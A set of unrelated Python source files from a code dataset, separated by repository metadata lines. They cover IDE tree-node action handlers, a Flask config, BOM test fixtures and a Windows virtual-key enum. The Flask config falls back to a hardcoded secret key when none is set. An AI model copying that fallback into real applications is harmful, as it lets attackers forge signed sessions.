    def OnInclude(self, event):
        pass
class _CanBeRenamed(object):
    """Mixin adding in-place tree-label renaming to an action handler.

    Relies on the host class providing ``controller``, ``_tree`` and a
    ``rename(new_name)`` method.
    """
    def OnRename(self, event):
        self._tree.label_editor.OnLabelEdit()
    def begin_label_edit(self):
        def label_edit():
            # FIXME: reaches into the tree's private controller to
            # re-resolve the node before editing.
            node = self._tree._controller.find_node_by_controller(
                self.controller)
            if node:
                self._tree.EditLabel(node)
        # Must handle pending events before label edit
        # This is a fix for situations where there is a pending action
        # that will change this label (Text Editor all changing actions)
        wx.CallAfter(label_edit)
        return True
    def end_label_edit(self, event):
        # Apply the rename only when the edit was confirmed and the new
        # label validates; otherwise veto so the old label is restored.
        if not event.IsEditCancelled():
            if self._is_valid_rename(event.GetLabel()):
                self.rename(event.GetLabel())
            else:
                event.Veto()
    def _is_valid_rename(self, label):
        # Delegate validation to the controller; show any error to the user.
        validation = self.controller.validate_name(label)
        if validation.error_message:
            self._show_validation_error(validation.error_message)
            return False
        return True
    def _show_validation_error(self, err_msg):
        wx.MessageBox(err_msg, 'Validation Error', style=wx.ICON_ERROR)
class DirectoryHandler(_ActionHandler):
    """Handler for plain (non test-data) directory nodes.

    The only offered action is creating a new resource file.
    """
    is_draggable = False
    is_test_suite = False
    can_be_rendered = False
    _actions = [_ActionHandler._label_new_resource]
    def OnNewResource(self, event):
        NewResourceDialog(self.controller, self._settings).execute()
class TestDataHandler(_ActionHandler):
    """Common behaviour for test-data nodes (suites, files, resources)."""
    # User keywords and variables may be dropped onto test-data nodes.
    accepts_drag = lambda self, dragged: \
        (isinstance(dragged, UserKeywordHandler) or
         isinstance(dragged, VariableHandler))
    is_draggable = False
    is_test_suite = True
    @property
    def tests(self):
        return self.controller.tests
    @property
    def keywords(self):
        return self.controller.keywords
    @property
    def variables(self):
        return self.controller.variables
    def has_been_modified_on_disk(self):
        return self.item.has_been_modified_on_disk()
    def do_drop(self, item):
        # Accept a dropped test/keyword by moving it into this node's data.
        self.controller.add_test_or_keyword(item)
    def rename(self, new_name):
        # Test-data nodes themselves are not renamed through this mixin hook.
        return False
    def OnSortKeywords(self, event):
        """Sorts the keywords inside the treenode"""
        self.controller.execute(SortKeywords())
    @property
    def can_be_rendered(self):
        # Render children lazily: only once, and only if there are any.
        if not self._has_children():
            return False
        return not self._rendered
    def _has_children(self):
        return (self.item.keyword_table or self.item.testcase_table or
                self.item.variable_table)
    def set_rendered(self):
        self._rendered = True
    def OnChangeFormat(self, event):
        ChangeFormatDialog(self.controller).execute()
    def OnNewUserKeyword(self, event):
        dlg = UserKeywordNameDialog(self.controller)
        if dlg.ShowModal() == wx.ID_OK:
            self.controller.execute(AddKeyword(dlg.get_name(), dlg.get_args()))
        dlg.Destroy()
    def OnNewScalar(self, event):
        self._new_var(ScalarVariableDialog)
    def OnNewListVariable(self, event):
        # Minimal plugin stand-in: the dialog only reads global_settings.
        class FakePlugin(object):
            global_settings = self._settings
        self._new_var(ListVariableDialog, plugin=FakePlugin())
    def OnNewDictionaryVariable(self, event):
        class FakePlugin(object):
            global_settings = self._settings
        self._new_var(DictionaryVariableDialog, plugin=FakePlugin())
    def _new_var(self, dialog_class, plugin=None):
        # Shared flow for all "new variable" dialogs.
        dlg = dialog_class(self._var_controller, plugin=plugin)
        if dlg.ShowModal() == wx.ID_OK:
            name, value = dlg.get_value()
            comment = dlg.get_comment()
            self.controller.execute(AddVariable(name, value, comment))
    @property
    def _var_controller(self):
        return self.controller.datafile_controller.variables
class TestDataDirectoryHandler(TestDataHandler):
    """Handler for test-data directory (suite directory) nodes.

    Builds its context menu dynamically: delete/exclude entries appear
    only for directories that have a parent (i.e. are not the root).
    """
    def __init__(self, *args):
        TestDataHandler.__init__(self, *args)
        self._actions = [
            _ActionHandler._label_add_suite,
            _ActionHandler._label_add_directory,
            _ActionHandler._label_new_resource,
            '---',
            _ActionHandler._label_new_user_keyword,
            _ActionHandler._label_new_scalar,
            _ActionHandler._label_new_list_variable,
            _ActionHandler._label_new_dict_variable,
            '---',
            _ActionHandler._label_change_format
        ]
        # Non-root directories can be deleted.
        if self.controller.parent:
            self._actions.extend([_ActionHandler._label_delete_no_kbsc])
        self._actions.extend([
            '---',
            _ActionHandler._label_select_all,
            _ActionHandler._label_deselect_all,
            _ActionHandler._label_select_failed_tests,
            _ActionHandler._label_select_passed_tests
        ])
        # Non-root directories can also be excluded from the project.
        if self.controller.parent:
            self._actions.extend(['---',
                                  _ActionHandler._label_exclude])
        self._actions.extend(['---',
                              _ActionHandler._label_expand_all,
                              _ActionHandler._label_collapse_all])
    def OnExpandAll(self, event):
        self._tree.ExpandAllSubNodes(self._node)
    def OnCollapseAll(self, event):
        self._tree.CollapseAllSubNodes(self._node)
    def OnNewSuite(self, event):
        AddSuiteDialog(self.controller, self._settings).execute()
    def OnNewDirectory(self, event):
        AddDirectoryDialog(self.controller, self._settings).execute()
    def OnNewResource(self, event):
        NewResourceDialog(self.controller, self._settings).execute()
    def OnDelete(self, event):
        FolderDeleteDialog(self.controller).execute()
    def OnExclude(self, event):
        # Excluding dirty (unsaved) data would lose changes, so refuse.
        try:
            self.controller.execute(Exclude())
        except DirtyRobotDataException:
            wx.MessageBox('Directory contains unsaved data!\n'
                          'You must save data before excluding.')
# NOTE(review): class name typo ("Than" should be "That"); kept because
# subclasses elsewhere reference this exact name.
class _FileHandlerThanCanBeRenamed(_CanBeRenamed):
    """Rename mixin for file-backed nodes: edits the file's basename and
    issues a file-rename command instead of a plain label change."""
    @overrides(_CanBeRenamed)
    def begin_label_edit(self):
        # Remember the display label and swap in the raw basename for editing.
        self._old_label = self._node.GetText()
        self._set_node_label(self.controller.basename)
        return _CanBeRenamed.begin_label_edit(self)
    @overrides(_CanBeRenamed)
    def end_label_edit(self, event):
        if not event.IsEditCancelled():
            result = self.controller.execute(
                self._rename_command(event.GetLabel()))
            if result:
                self._rename_ok_handler()
                self._old_label = self.controller.basename
            else:
                # Rename failed: veto so the edited label is rolled back.
                event.Veto()
        else:
            # Edit cancelled: restore the original display label.
            self._set_node_label(self._old_label)
    def _rename_ok_handler(self):
        # Hook for subclasses; called after a successful rename.
        pass
    def _rename_command(self, label):
        # Subclasses must supply the concrete rename command.
        raise NotImplementedError(self.__class__)
    def _set_node_label(self, label):
        self._tree.SetItemText(self._node, label)
class ResourceFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
    """Handler for resource-file nodes (keywords/variables, no tests)."""
    is_test_suite = False
    _actions = [_ActionHandler._label_new_user_keyword,
                _ActionHandler._label_new_scalar,
                _ActionHandler._label_new_list_variable,
                _ActionHandler._label_new_dict_variable,
                '---',
                _ActionHandler._label_rename,
                _ActionHandler._label_change_format,
                _ActionHandler._label_sort_keywords,
                _ActionHandler._label_find_usages,
                _ActionHandler._label_delete]
    def OnFindUsages(self, event):
        ResourceFileUsages(self.controller, self._tree.highlight).show()
    def OnDelete(self, event):
        ResourceDeleteDialog(self.controller).execute()
    def OnSafeDelete(self, event):
        return self.OnDelete(event)
    @overrides(_FileHandlerThanCanBeRenamed)
    def _rename_command(self, label):
        # The callback lets the user decide whether static imports that
        # reference this resource should be rewritten too.
        return RenameResourceFile(
            label, self._check_should_rename_static_imports)
    def _check_should_rename_static_imports(self):
        return ResourceRenameDialog(self.controller).execute()
class TestCaseFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
    """Handler for test-case file nodes."""
    # Any draggable item may be dropped onto a test case file.
    accepts_drag = lambda *args: True
    _actions = [_ActionHandler._label_new_test_case,
                _ActionHandler._label_new_user_keyword,
                _ActionHandler._label_new_scalar,
                _ActionHandler._label_new_list_variable,
                _ActionHandler._label_new_dict_variable,
                '---',
                _ActionHandler._label_rename,
                _ActionHandler._label_change_format,
                _ActionHandler._label_sort_keywords,
                _ActionHandler._label_delete,
                '---',
                _ActionHandler._label_select_all,
                _ActionHandler._label_deselect_all,
                _ActionHandler._label_select_failed_tests,
                _ActionHandler._label_select_passed_tests
                ]
    def OnNewTestCase(self, event):
        dlg = TestCaseNameDialog(self.controller)
        if dlg.ShowModal() == wx.ID_OK:
            self.controller.execute(AddTestCase(dlg.get_name()))
        dlg.Destroy()
    def OnDelete(self, event):
        # Confirm with the user before deleting the file from disk.
        if wx.MessageBox('Delete test case file', caption='Confirm',
                         style=wx.YES_NO | wx.ICON_QUESTION) == wx.YES:
            self.controller.execute(DeleteFile())
    def OnSafeDelete(self, event):
        return self.OnDelete(event)
    @overrides(_FileHandlerThanCanBeRenamed)
    def _rename_command(self, label):
        return RenameFile(label)
    @overrides(_FileHandlerThanCanBeRenamed)
    def _rename_ok_handler(self):
        # Selections refer to the old name; clear them after a rename.
        self._tree.DeselectAllTests(self._node)
class _TestOrUserKeywordHandler(_CanBeRenamed, _ActionHandler):
    """Shared behaviour for test-case and user-keyword (macro) nodes:
    copy, move up/down, rename and delete."""
    accepts_drag = lambda *args: False
    is_draggable = True
    _actions = [
        _ActionHandler._label_copy_macro, 'Move Up\tCtrl-Up',
        'Move Down\tCtrl-Down', _ActionHandler._label_rename, '---', 'Delete'
    ]
    def remove(self):
        self.controller.delete()
    def rename(self, new_name):
        # Subclasses supply the concrete command via _create_rename_command.
        self.controller.execute(self._create_rename_command(new_name))
    def OnCopy(self, event):
        dlg = self._copy_name_dialog_class(self.controller, self.item)
        if dlg.ShowModal() == wx.ID_OK:
            self.controller.execute(CopyMacroAs(dlg.get_name()))
        dlg.Destroy()
    def OnMoveUp(self, event):
        # Move in the data model first; mirror in the tree only on success.
        if self.controller.move_up():
            self._tree.move_up(self._node)
    def OnMoveDown(self, event):
        if self.controller.move_down():
            self._tree.move_down(self._node)
    def OnDelete(self, event):
        self.controller.execute(RemoveMacro(self.controller))
class TestCaseHandler(_TestOrUserKeywordHandler):
    """Handler for individual test-case nodes."""
    _datalist = property(lambda self: self.item.datalist)
    _copy_name_dialog_class = TestCaseNameDialog
    def _add_copy_to_tree(self, parent_node, copied):
        self._tree.add_test(parent_node, copied)
    def _create_rename_command(self, new_name):
        return RenameTest(new_name)
class UserKeywordHandler(_TestOrUserKeywordHandler):
    """Handler for user-keyword nodes; adds usage search to the macro menu."""
    is_user_keyword = True
    _datalist = property(lambda self: self.item.datalist)
    _copy_name_dialog_class = CopyUserKeywordDialog
    _actions = _TestOrUserKeywordHandler._actions + [
        _ActionHandler._label_find_usages]
    def _add_copy_to_tree(self, parent_node, copied):
        self._tree.add_keyword(parent_node, copied)
    def _create_rename_command(self, new_name):
        # Renaming a keyword rewrites every occurrence, with progress UI.
        return RenameKeywordOccurrences(
            self.controller.name, new_name,
            RenameProgressObserver(self.GetParent().GetParent()),
            self.controller.info)
    def OnFindUsages(self, event):
        Usages(self.controller, self._tree.highlight).show()
class VariableHandler(_CanBeRenamed, _ActionHandler):
    """Handler for variable nodes: rename, delete and open-on-double-click."""
    accepts_drag = lambda *args: False
    is_draggable = True
    is_variable = True
    # Variables cannot be reordered via the keyboard shortcuts.
    OnMoveUp = OnMoveDown = lambda *args: None
    _actions = [_ActionHandler._label_rename, 'Delete']
    @overrides(_ActionHandler)
    def double_clicked(self):
        RideOpenVariableDialog(controller=self.controller).publish()
    def OnDelete(self, event):
        self.remove()
    def remove(self):
        self.controller.delete()
    def rename(self, new_name):
        self.controller.execute(UpdateVariableName(new_name))
    @property
    def index(self):
        # Position of the variable within its variable table.
        return self.controller.index
class ResourceRootHandler(_ActionHandler):
    """Handler for the synthetic root node that groups loaded resources."""
    can_be_rendered = is_draggable = is_user_keyword = is_test_suite = False
    rename = lambda self, new_name: False
    accepts_drag = lambda self, dragged: False
    _actions = [_ActionHandler._label_add_resource]
    @property
    def item(self):
        # The root has no backing data object.
        return None
    def OnAddResource(self, event):
        # Ask for a resource file path and load it with progress feedback.
        path = RobotFilePathDialog(
            self, self.controller, self._settings).execute()
        if path:
            self.controller.load_resource(path, LoadProgressObserver(self))
class ExcludedDirectoryHandler(TestDataDirectoryHandler):
    """Handler for directories excluded from the project; only offers
    re-inclusion."""
    is_draggable = False
    is_test_suite = True
    def __init__(self, *args):
        # Skip TestDataDirectoryHandler.__init__ on purpose: excluded
        # directories expose only the Include action.
        TestDataHandler.__init__(self, *args)
        self._actions = [_ActionHandler._label_include]
    def OnInclude(self, event):
        self.controller.execute(Include())
| 1.359375 | 1 |
config.py | rajatomar788/pyblog | 0 | 16927 | <filename>config.py
import os
basedir = os.path.abspath(os.path.dirname(__file__))


class Config(object):
    """Flask application settings, resolved from environment variables with
    local-development fallbacks."""

    SECRET_KEY = os.environ.get('SECRET_KEY') or 'rajatomar788'

    # Database selection: fall back to a local SQLite file when no
    # DATABASE_URL is set.
    # NOTE(review): the EXTRA_DATABASE branch only runs when DATABASE_URL is
    # *also* set, so EXTRA_DATABASE silently overrides it — confirm intended.
    if os.environ.get('DATABASE_URL') is None:
        SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
    elif os.environ.get('EXTRA_DATABASE') is not None:
        SQLALCHEMY_DATABASE_URI = os.environ['EXTRA_DATABASE']
    else:
        SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
    SQLALCHEMY_TRACK_MODIFICATIONS = False

    # Search / pagination limits.
    MAX_SEARCH_RESULTS = 50
    POSTS_PER_PAGE = 20
    basedir = basedir

    # Upload restrictions (set literal instead of set([...])).
    ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
    MAX_CONTENT_PATH = 16 * 1024 * 1024

    # mail server settings
    MAIL_SERVER = 'localhost'
    MAIL_PORT = 25
    MAIL_USERNAME = 'Raja'
    MAIL_PASSWORD = '<PASSWORD>'

    # administrator list
    ADMINS = ['<EMAIL>']
| 2.078125 | 2 |
ceefax/fonts/size7extracondensed/__init__.py | mscroggs/CEEFAX | 1 | 16928 | from .default import size7extracondensedfont
| 1.117188 | 1 |
bom/helpers.py | gxyp/indabom | 0 | 16929 | <reponame>gxyp/indabom<gh_stars>0
from bom.octopart_parts_match import match_part
from bom.models import Part, PartClass, Seller, SellerPart, Subpart, \
Manufacturer, Organization, PartFile
def create_a_fake_organization(user, free=False):
    """Create and persist a test organization owned by *user*.

    The subscription is 'F' (free) when *free* is true, otherwise 'P'.
    """
    subscription = 'F' if free else 'P'
    organization = Organization(
        name="Atlas",
        subscription=subscription,
        owner=user)
    organization.save()
    return organization
def create_some_fake_part_classes():
    """Create and persist three test part classes; return them as a tuple."""
    specs = (
        (500, 'Wendy', 'Mechanical Switches'),
        (200, 'Archibald', ''),
        (503, 'Ghost', 'Like Kasper'),
    )
    part_classes = []
    for code, name, comment in specs:
        part_class = PartClass(code=code, name=name, comment=comment)
        part_class.save()
        part_classes.append(part_class)
    return tuple(part_classes)
def create_a_fake_subpart(assembly_part, assembly_subpart, count=4):
    """Create and persist a Subpart placing *assembly_subpart* into
    *assembly_part* with the given *count*."""
    subpart = Subpart(
        assembly_part=assembly_part,
        assembly_subpart=assembly_subpart,
        count=count,
    )
    subpart.save()
    return subpart
def create_some_fake_sellers(organization):
    """Create and persist three test sellers for *organization*."""
    sellers = []
    for name in ('Mouser', 'Digi-Key', 'Archibald'):
        seller = Seller(name=name, organization=organization)
        seller.save()
        sellers.append(seller)
    return tuple(sellers)
def create_some_fake_manufacturers(organization):
    """Create and persist three test manufacturers for *organization*."""
    manufacturers = []
    for name in ('STMicroelectronics', 'Nordic Semiconductor', 'Murata'):
        manufacturer = Manufacturer(name=name, organization=organization)
        manufacturer.save()
        manufacturers.append(manufacturer)
    return tuple(manufacturers)
def create_a_fake_seller_part(seller, part, moq, mpq, unit_cost, lead_time_days):
    """Create and persist a SellerPart with the given ordering terms.

    moq/mpq are the minimum order/pack quantities; any of the terms may be
    None to model a seller with no published data.
    """
    seller_part = SellerPart(
        seller=seller,
        part=part,
        minimum_order_quantity=moq,
        minimum_pack_quantity=mpq,
        unit_cost=unit_cost,
        lead_time_days=lead_time_days,
    )
    seller_part.save()
    return seller_part
def create_some_fake_parts(organization):
    """Create and persist a small parts catalogue for *organization*.

    Builds three parts (with part classes and manufacturers), wires two of
    them into the first as subparts, and attaches seller parts with varied
    ordering terms. Returns the three Part objects.
    """
    (pc1, pc2, pc3) = create_some_fake_part_classes()
    (m1, m2, m3) = create_some_fake_manufacturers(organization=organization)
    pt1 = Part(
        manufacturer_part_number='STM32F401CEU6',
        number_class=pc2,
        number_item='3333',
        description='Brown dog',
        revision='1',
        manufacturer=m1,
        organization=organization)
    pt1.save()
    pt2 = Part(
        manufacturer_part_number='GRM1555C1H100JA01D',
        number_class=pc1,
        description='',
        manufacturer=None,
        organization=organization)
    pt2.save()
    pt3 = Part(
        manufacturer_part_number='NRF51822',
        number_class=pc3,
        description='Friendly ghost',
        manufacturer=m3,
        organization=organization)
    pt3.save()
    # pt1 is an assembly containing pt2 (count defaults to 4) and pt3 (x10).
    create_a_fake_subpart(pt1, pt2)
    create_a_fake_subpart(pt1, pt3, count=10)
    (s1, s2, s3) = create_some_fake_sellers(organization=organization)
    # Seller terms: one seller with no data, one priced with MOQ/MPQ,
    # and one zero-cost entry.
    create_a_fake_seller_part(
        s1,
        pt1,
        moq=None,
        mpq=None,
        unit_cost=None,
        lead_time_days=None)
    create_a_fake_seller_part(
        s2,
        pt1,
        moq=1000,
        mpq=5000,
        unit_cost=0.1005,
        lead_time_days=7)
    create_a_fake_seller_part(
        s2,
        pt2,
        moq=200,
        mpq=200,
        unit_cost=0,
        lead_time_days=47)
    return pt1, pt2, pt3
def create_a_fake_partfile(file, part):
    """Create and persist a PartFile attaching *file* to *part*."""
    # Bug fix: the *file* argument was previously ignored (file=None was
    # always stored); pass it through so the created PartFile carries it.
    pf1 = PartFile(file=file, part=part)
    pf1.save()
    return pf1
| 2.25 | 2 |
keycodes/key/codes/win.py | jonchun/ptoys-mapper | 0 | 16930 | <filename>keycodes/key/codes/win.py<gh_stars>0
# Source:
# https://github.com/tpn/winsdk-10/blob/46c66795f49679eb4783377968ce25f6c778285a/Include/10.0.10240.0/um/WinUser.h
# # convert all C-style comments to python multi-line string comment
# find: (^/\*[\s\S\r]+?\*/)
# replace: """\n$1\n"""
# # convert all keycode #defines to be python constants
# find: #define\s(.+_.+?)\s+([\w]+)(\s*)(/[/*].+)?
# replace: $1 = $2$3# $4\n
# # clean up results by removing lines with only a single # caused by previous regex
# find: ^# $\n
# replace:
# # clean up duplicate newlines
# find: (\s#.+\n)\n
# replace: $1
# # clean up multi-line comments.
# find: ^(\s{3,})(\S.+)
# replace: $1 # $2
from enum import IntEnum
class WinCodes(IntEnum):
    """
    /*
     * Virtual Keys, Standard Set
     */
    """
    # Windows virtual-key codes transcribed from WinUser.h (see the
    # conversion notes above this class).
    # NOTE: several VK_* names intentionally share a value (e.g. VK_KANA,
    # VK_HANGEUL and VK_HANGUL are all 0x15); IntEnum treats the later
    # names as aliases of the first member with that value, so they compare
    # equal and are skipped when iterating the enum.
    VK_LBUTTON = 0x01
    VK_RBUTTON = 0x02
    VK_CANCEL = 0x03
    VK_MBUTTON = 0x04  # /* NOT contiguous with L & RBUTTON */
    # if(_WIN32_WINNT >= 0x0500)
    VK_XBUTTON1 = 0x05  # /* NOT contiguous with L & RBUTTON */
    VK_XBUTTON2 = 0x06  # /* NOT contiguous with L & RBUTTON */
    # endif /* _WIN32_WINNT >= 0x0500 */
    """
    /*
     * 0x07 : reserved
     */
    """
    VK_BACK = 0x08
    VK_TAB = 0x09
    """
    /*
     * 0x0A - 0x0B : reserved
     */
    """
    VK_CLEAR = 0x0C
    VK_RETURN = 0x0D
    """
    /*
     * 0x0E - 0x0F : unassigned
     */
    """
    VK_SHIFT = 0x10
    VK_CONTROL = 0x11
    VK_MENU = 0x12
    VK_PAUSE = 0x13
    VK_CAPITAL = 0x14
    VK_KANA = 0x15
    VK_HANGEUL = 0x15  # /* old name - should be here for compatibility */
    VK_HANGUL = 0x15
    """
    /*
     * 0x16 : unassigned
     */
    """
    VK_JUNJA = 0x17
    VK_FINAL = 0x18
    VK_HANJA = 0x19
    VK_KANJI = 0x19
    """
    /*
     * 0x1A : unassigned
     */
    """
    VK_ESCAPE = 0x1B
    VK_CONVERT = 0x1C
    VK_NONCONVERT = 0x1D
    VK_ACCEPT = 0x1E
    VK_MODECHANGE = 0x1F
    VK_SPACE = 0x20
    VK_PRIOR = 0x21
    VK_NEXT = 0x22
    VK_END = 0x23
    VK_HOME = 0x24
    VK_LEFT = 0x25
    VK_UP = 0x26
    VK_RIGHT = 0x27
    VK_DOWN = 0x28
    VK_SELECT = 0x29
    VK_PRINT = 0x2A
    VK_EXECUTE = 0x2B
    VK_SNAPSHOT = 0x2C
    VK_INSERT = 0x2D
    VK_DELETE = 0x2E
    VK_HELP = 0x2F
    """
    /*
     * VK_0 - VK_9 are the same as ASCII '0' - '9' (0x30 - 0x39)
     * 0x3A - 0x40 : unassigned
     * VK_A - VK_Z are the same as ASCII 'A' - 'Z' (0x41 - 0x5A)
     */
    """
    VK_0 = 0x30
    VK_1 = 0x31
    VK_2 = 0x32
    VK_3 = 0x33
    VK_4 = 0x34
    VK_5 = 0x35
    VK_6 = 0x36
    VK_7 = 0x37
    VK_8 = 0x38
    VK_9 = 0x39
    VK_A = 0x41
    VK_B = 0x42
    VK_C = 0x43
    VK_D = 0x44
    VK_E = 0x45
    VK_F = 0x46
    VK_G = 0x47
    VK_H = 0x48
    VK_I = 0x49
    VK_J = 0x4A
    VK_K = 0x4B
    VK_L = 0x4C
    VK_M = 0x4D
    VK_N = 0x4E
    VK_O = 0x4F
    VK_P = 0x50
    VK_Q = 0x51
    VK_R = 0x52
    VK_S = 0x53
    VK_T = 0x54
    VK_U = 0x55
    VK_V = 0x56
    VK_W = 0x57
    VK_X = 0x58
    VK_Y = 0x59
    VK_Z = 0x5A
    VK_LWIN = 0x5B
    VK_RWIN = 0x5C
    VK_APPS = 0x5D
    """
    /*
     * 0x5E : reserved
     */
    """
    VK_SLEEP = 0x5F
    VK_NUMPAD0 = 0x60
    VK_NUMPAD1 = 0x61
    VK_NUMPAD2 = 0x62
    VK_NUMPAD3 = 0x63
    VK_NUMPAD4 = 0x64
    VK_NUMPAD5 = 0x65
    VK_NUMPAD6 = 0x66
    VK_NUMPAD7 = 0x67
    VK_NUMPAD8 = 0x68
    VK_NUMPAD9 = 0x69
    VK_MULTIPLY = 0x6A
    VK_ADD = 0x6B
    VK_SEPARATOR = 0x6C
    VK_SUBTRACT = 0x6D
    VK_DECIMAL = 0x6E
    VK_DIVIDE = 0x6F
    VK_F1 = 0x70
    VK_F2 = 0x71
    VK_F3 = 0x72
    VK_F4 = 0x73
    VK_F5 = 0x74
    VK_F6 = 0x75
    VK_F7 = 0x76
    VK_F8 = 0x77
    VK_F9 = 0x78
    VK_F10 = 0x79
    VK_F11 = 0x7A
    VK_F12 = 0x7B
    VK_F13 = 0x7C
    VK_F14 = 0x7D
    VK_F15 = 0x7E
    VK_F16 = 0x7F
    VK_F17 = 0x80
    VK_F18 = 0x81
    VK_F19 = 0x82
    VK_F20 = 0x83
    VK_F21 = 0x84
    VK_F22 = 0x85
    VK_F23 = 0x86
    VK_F24 = 0x87
    # if(_WIN32_WINNT >= 0x0604)
    """
    /*
     * 0x88 - 0x8F : UI navigation
     */
    """
    VK_NAVIGATION_VIEW = 0x88
    VK_NAVIGATION_MENU = 0x89
    VK_NAVIGATION_UP = 0x8A
    VK_NAVIGATION_DOWN = 0x8B
    VK_NAVIGATION_LEFT = 0x8C
    VK_NAVIGATION_RIGHT = 0x8D
    VK_NAVIGATION_ACCEPT = 0x8E
    VK_NAVIGATION_CANCEL = 0x8F
    # endif /* _WIN32_WINNT >= 0x0604 */
    VK_NUMLOCK = 0x90
    VK_SCROLL = 0x91
    """
    /*
     * NEC PC-9800 kbd definitions
     */
    """
    VK_OEM_NEC_EQUAL = 0x92  # // '=' key on numpad
    """
    /*
     * Fujitsu/OASYS kbd definitions
     */
    """
    VK_OEM_FJ_JISHO = 0x92  # // 'Dictionary' key
    VK_OEM_FJ_MASSHOU = 0x93  # // 'Unregister word' key
    VK_OEM_FJ_TOUROKU = 0x94  # // 'Register word' key
    VK_OEM_FJ_LOYA = 0x95  # // 'Left OYAYUBI' key
    VK_OEM_FJ_ROYA = 0x96  # // 'Right OYAYUBI' key
    """
    /*
     * 0x97 - 0x9F : unassigned
     */
    """
    """
    /*
     * VK_L* & VK_R* - left and right Alt, Ctrl and Shift virtual keys.
     * Used only as parameters to GetAsyncKeyState() and GetKeyState().
     * No other API or message will distinguish left and right keys in this way.
     */
    """
    VK_LSHIFT = 0xA0
    VK_RSHIFT = 0xA1
    VK_LCONTROL = 0xA2
    VK_RCONTROL = 0xA3
    VK_LMENU = 0xA4
    VK_RMENU = 0xA5
    # if(_WIN32_WINNT >= 0x0500)
    VK_BROWSER_BACK = 0xA6
    VK_BROWSER_FORWARD = 0xA7
    VK_BROWSER_REFRESH = 0xA8
    VK_BROWSER_STOP = 0xA9
    VK_BROWSER_SEARCH = 0xAA
    VK_BROWSER_FAVORITES = 0xAB
    VK_BROWSER_HOME = 0xAC
    VK_VOLUME_MUTE = 0xAD
    VK_VOLUME_DOWN = 0xAE
    VK_VOLUME_UP = 0xAF
    VK_MEDIA_NEXT_TRACK = 0xB0
    VK_MEDIA_PREV_TRACK = 0xB1
    VK_MEDIA_STOP = 0xB2
    VK_MEDIA_PLAY_PAUSE = 0xB3
    VK_LAUNCH_MAIL = 0xB4
    VK_LAUNCH_MEDIA_SELECT = 0xB5
    VK_LAUNCH_APP1 = 0xB6
    VK_LAUNCH_APP2 = 0xB7
    # endif /* _WIN32_WINNT >= 0x0500 */
    """
    /*
     * 0xB8 - 0xB9 : reserved
     */
    """
    VK_OEM_1 = 0xBA  # // ';:' for US
    VK_OEM_PLUS = 0xBB  # // '+' any country
    VK_OEM_COMMA = 0xBC  # // ',' any country
    VK_OEM_MINUS = 0xBD  # // '-' any country
    VK_OEM_PERIOD = 0xBE  # // '.' any country
    VK_OEM_2 = 0xBF  # // '/?' for US
    VK_OEM_3 = 0xC0  # // '`~' for US
    """
    /*
     * 0xC1 - 0xC2 : reserved
     */
    """
    # if(_WIN32_WINNT >= 0x0604)
    """
    /*
     * 0xC3 - 0xDA : Gamepad input
     */
    """
    VK_GAMEPAD_A = 0xC3
    VK_GAMEPAD_B = 0xC4
    VK_GAMEPAD_X = 0xC5
    VK_GAMEPAD_Y = 0xC6
    VK_GAMEPAD_RIGHT_SHOULDER = 0xC7
    VK_GAMEPAD_LEFT_SHOULDER = 0xC8
    VK_GAMEPAD_LEFT_TRIGGER = 0xC9
    VK_GAMEPAD_RIGHT_TRIGGER = 0xCA
    VK_GAMEPAD_DPAD_UP = 0xCB
    VK_GAMEPAD_DPAD_DOWN = 0xCC
    VK_GAMEPAD_DPAD_LEFT = 0xCD
    VK_GAMEPAD_DPAD_RIGHT = 0xCE
    VK_GAMEPAD_MENU = 0xCF
    VK_GAMEPAD_VIEW = 0xD0
    VK_GAMEPAD_LEFT_THUMBSTICK_BUTTON = 0xD1
    VK_GAMEPAD_RIGHT_THUMBSTICK_BUTTON = 0xD2
    VK_GAMEPAD_LEFT_THUMBSTICK_UP = 0xD3
    VK_GAMEPAD_LEFT_THUMBSTICK_DOWN = 0xD4
    VK_GAMEPAD_LEFT_THUMBSTICK_RIGHT = 0xD5
    VK_GAMEPAD_LEFT_THUMBSTICK_LEFT = 0xD6
    VK_GAMEPAD_RIGHT_THUMBSTICK_UP = 0xD7
    VK_GAMEPAD_RIGHT_THUMBSTICK_DOWN = 0xD8
    VK_GAMEPAD_RIGHT_THUMBSTICK_RIGHT = 0xD9
    VK_GAMEPAD_RIGHT_THUMBSTICK_LEFT = 0xDA
    # endif /* _WIN32_WINNT >= 0x0604 */
    VK_OEM_4 = 0xDB  # // '[{' for US
    VK_OEM_5 = 0xDC  # // '\|' for US
    VK_OEM_6 = 0xDD  # // ']}' for US
    VK_OEM_7 = 0xDE  # // ''"' for US
    VK_OEM_8 = 0xDF
    """
    /*
     * 0xE0 : reserved
     */
    """
    """
    /*
     * Various extended or enhanced keyboards
     */
    """
    VK_OEM_AX = 0xE1  # // 'AX' key on Japanese AX kbd
    VK_OEM_102 = 0xE2  # // "<>" or "\|" on RT 102-key kbd.
    VK_ICO_HELP = 0xE3  # // Help key on ICO
    VK_ICO_00 = 0xE4  # // 00 key on ICO
    # if(WINVER >= 0x0400)
    VK_PROCESSKEY = 0xE5
    # endif /* WINVER >= 0x0400 */
    VK_ICO_CLEAR = 0xE6
    # if(_WIN32_WINNT >= 0x0500)
    VK_PACKET = 0xE7
    # endif /* _WIN32_WINNT >= 0x0500 */
    """
    /*
     * 0xE8 : unassigned
     */
    """
    """
    /*
     * Nokia/Ericsson definitions
     */
    """
    VK_OEM_RESET = 0xE9
    VK_OEM_JUMP = 0xEA
    VK_OEM_PA1 = 0xEB
    VK_OEM_PA2 = 0xEC
    VK_OEM_PA3 = 0xED
    VK_OEM_WSCTRL = 0xEE
    VK_OEM_CUSEL = 0xEF
    VK_OEM_ATTN = 0xF0
    VK_OEM_FINISH = 0xF1
    VK_OEM_COPY = 0xF2
    VK_OEM_AUTO = 0xF3
    VK_OEM_ENLW = 0xF4
    VK_OEM_BACKTAB = 0xF5
    VK_ATTN = 0xF6
    VK_CRSEL = 0xF7
    VK_EXSEL = 0xF8
    VK_EREOF = 0xF9
    VK_PLAY = 0xFA
    VK_ZOOM = 0xFB
    VK_NONAME = 0xFC
    VK_PA1 = 0xFD
    VK_OEM_CLEAR = 0xFE
    """
    /*
     * 0xFF : reserved
     */
    """
    # Custom Value Added
    # (0x100 is outside the Windows VK range, used as an in-app sentinel.)
    VK_DISABLED = 0x100
